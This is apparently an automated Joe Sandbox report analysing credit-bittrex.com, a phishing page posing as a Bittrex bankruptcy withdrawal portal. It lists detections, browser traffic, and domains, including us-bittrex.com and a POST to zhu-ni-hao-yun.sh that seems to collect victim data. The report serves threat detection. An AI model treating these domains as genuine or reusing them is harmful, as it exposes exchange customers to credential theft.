Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://credit-bittrex.com/creditor

Overview

General Information

Sample URL:https://credit-bittrex.com/creditor
Analysis ID:1417085
Infos:

Detection

Phisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Phisher
HTML body contains low number of good links

Classification

  • System is w10x64
  • chrome.exe (PID: 5548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2188,i,8863006628045067295,9348882958572428432,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://credit-bittrex.com/creditor" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_51JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_52JoeSecurity_Phisher_2Yara detected PhisherJoe Security
      dropped/chromecache_54JoeSecurity_Phisher_2Yara detected PhisherJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://credit-bittrex.com/creditorSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

        Phishing

        barindex
        Source: Yara matchFile source: dropped/chromecache_51, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_52, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_54, type: DROPPED
        Source: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/HTTP Parser: Number of links: 0
        Source: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/HTTP Parser: No <meta name="author".. found
        Source: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/HTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49748 version: TLS 1.2
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
        Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
        Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
        Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
        Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /creditor HTTP/1.1Host: credit-bittrex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /creditor/ HTTP/1.1Host: credit-bittrex.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /withdrawal HTTP/1.1Host: us-bittrex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://credit-bittrex.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /withdrawal/ HTTP/1.1Host: us-bittrex.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: us-bittrex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://us-bittrex.com/withdrawal/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sessionid=0
        Source: global trafficHTTP traffic detected: GET /bankruptcy/withdrawal/chapter11/debtor/ HTTP/1.1Host: us-bittrex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://us-bittrex.com/withdrawal/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sessionid=0
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: us-bittrex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sessionid=0
        Source: global trafficHTTP traffic detected: GET /bankruptcy/withdrawal/chapter11/debtor/js/contracts.js HTTP/1.1Host: us-bittrex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sessionid=0
        Source: global trafficHTTP traffic detected: GET /bankruptcy/withdrawal/chapter11/debtor/js/main.js HTTP/1.1Host: us-bittrex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sessionid=0
        Source: global trafficHTTP traffic detected: GET /bankruptcy/withdrawal/chapter11/debtor/js/entry.js HTTP/1.1Host: us-bittrex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sessionid=0
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /api/authenticate HTTP/1.1Host: zhu-ni-hao-yun.shConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: unknownDNS traffic detected: queries for: credit-bittrex.com
        Source: unknownHTTP traffic detected: POST /api/authenticate HTTP/1.1Host: zhu-ni-hao-yun.shConnection: keep-aliveContent-Length: 627sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*Content-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://us-bittrex.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://us-bittrex.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 28 Mar 2024 14:45:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4520Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Thu, 28 Mar 2024 14:45:47 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3KY6KE1%2BY0Knvx9Hl7WA9o0TtCt%2FG55EMz8oLXK%2Ff7B8fi0riI1WQJtRvZYdkfYhDNJns4kOGrsX0hLv2K%2FNjdCntY0%2BgRbEW3lIDKDAg7M6OTVyesoC544vnmsZ94yfZuSCVg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86b8678fda913882-IADalt-svc: h3=":443"; ma=86400
        Source: chromecache_52.2.dr, chromecache_51.2.drString found in binary or memory: https://google.com
        Source: chromecache_54.2.drString found in binary or memory: https://us-bittrex.com/withdrawal
        Source: chromecache_56.2.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49748 version: TLS 1.2
        Source: classification engineClassification label: mal56.phis.win@17/18@20/9
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2188,i,8863006628045067295,9348882958572428432,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://credit-bittrex.com/creditor"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 --field-trial-handle=2188,i,8863006628045067295,9348882958572428432,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
        Process Injection
        1
        Process Injection
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://credit-bittrex.com/creditor0%Avira URL Cloudsafe
        https://credit-bittrex.com/creditor1%VirustotalBrowse
        https://credit-bittrex.com/creditor100%SlashNextCredential Stealing type: Phishing & Social Engineering
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        credit-bittrex.com0%VirustotalBrowse
        zhu-ni-hao-yun.sh1%VirustotalBrowse
        us-bittrex.com0%VirustotalBrowse
        fp2e7a.wpc.phicdn.net0%VirustotalBrowse
        SourceDetectionScannerLabelLink
        https://us-bittrex.com/favicon.ico0%Avira URL Cloudsafe
        https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/js/contracts.js0%Avira URL Cloudsafe
        https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/js/main.js0%Avira URL Cloudsafe
        https://zhu-ni-hao-yun.sh/api/authenticate0%Avira URL Cloudsafe
        https://us-bittrex.com/withdrawal0%Avira URL Cloudsafe
        https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/js/entry.js0%Avira URL Cloudsafe
        https://credit-bittrex.com/creditor/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          high
          credit-bittrex.com
          172.67.150.105
          truefalseunknown
          zhu-ni-hao-yun.sh
          172.67.213.53
          truefalseunknown
          us-bittrex.com
          172.67.150.61
          truefalseunknown
          www.google.com
          172.253.63.147
          truefalse
            high
            fp2e7a.wpc.phicdn.net
            192.229.211.108
            truefalseunknown
            NameMaliciousAntivirus DetectionReputation
            https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/js/contracts.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://a.nel.cloudflare.com/report/v4?s=2jyDMb%2FV7iVu0z3YYb7JSUPuSVXTgCcrf0JTb8gEbJmRLmE%2F6NDg74LRBFFR6FJx6DMbvA%2FDXusEAywRqWc9N4ho658FerOWetbV%2BMGq3AJiJbeZibWrjLAI2dTpkLpv%2FkeLag%3D%3Dfalse
              high
              https://credit-bittrex.com/creditortrue
                unknown
                https://us-bittrex.com/favicon.icofalse
                • Avira URL Cloud: safe
                unknown
                https://us-bittrex.com/withdrawal/false
                  unknown
                  https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/js/main.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://zhu-ni-hao-yun.sh/api/authenticatefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://us-bittrex.com/withdrawalfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/js/entry.jsfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://credit-bittrex.com/creditor/false
                  • Avira URL Cloud: safe
                  unknown
                  https://a.nel.cloudflare.com/report/v4?s=3KY6KE1%2BY0Knvx9Hl7WA9o0TtCt%2FG55EMz8oLXK%2Ff7B8fi0riI1WQJtRvZYdkfYhDNJns4kOGrsX0hLv2K%2FNjdCntY0%2BgRbEW3lIDKDAg7M6OTVyesoC544vnmsZ94yfZuSCVg%3D%3Dfalse
                    high
                    https://us-bittrex.com/bankruptcy/withdrawal/chapter11/debtor/false
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://google.comchromecache_52.2.dr, chromecache_51.2.drfalse
                        high
                        https://www.cloudflare.com/5xx-error-landingchromecache_56.2.drfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          172.67.150.105
                          credit-bittrex.comUnited States
                          13335CLOUDFLARENETUSfalse
                          172.67.150.61
                          us-bittrex.comUnited States
                          13335CLOUDFLARENETUSfalse
                          172.67.213.53
                          zhu-ni-hao-yun.shUnited States
                          13335CLOUDFLARENETUSfalse
                          172.253.63.147
                          www.google.comUnited States
                          15169GOOGLEUSfalse
                          239.255.255.250
                          unknownReserved
                          unknownunknownfalse
                          35.190.80.1
                          a.nel.cloudflare.comUnited States
                          15169GOOGLEUSfalse
                          IP
                          192.168.2.17
                          192.168.2.16
                          192.168.2.4
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1417085
                          Start date and time:2024-03-28 15:44:34 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 3m 21s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:browseurl.jbs
                          Sample URL:https://credit-bittrex.com/creditor
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal56.phis.win@17/18@20/9
                          EGA Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 172.253.115.94, 172.253.115.139, 172.253.115.138, 172.253.115.102, 172.253.115.100, 172.253.115.101, 172.253.115.113, 172.253.63.84, 34.104.35.123, 172.253.63.95, 142.250.31.95, 142.251.163.95, 172.253.62.95, 142.251.167.95, 172.253.122.95, 172.253.115.95, 142.251.16.95, 142.251.111.95, 20.12.23.50, 104.97.85.136, 104.97.85.183, 104.97.85.143, 192.229.211.108, 13.85.23.206, 52.165.164.15, 172.253.122.94
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          No simulations
                          No context
                          No context
                          No context
                          No context
                          No context
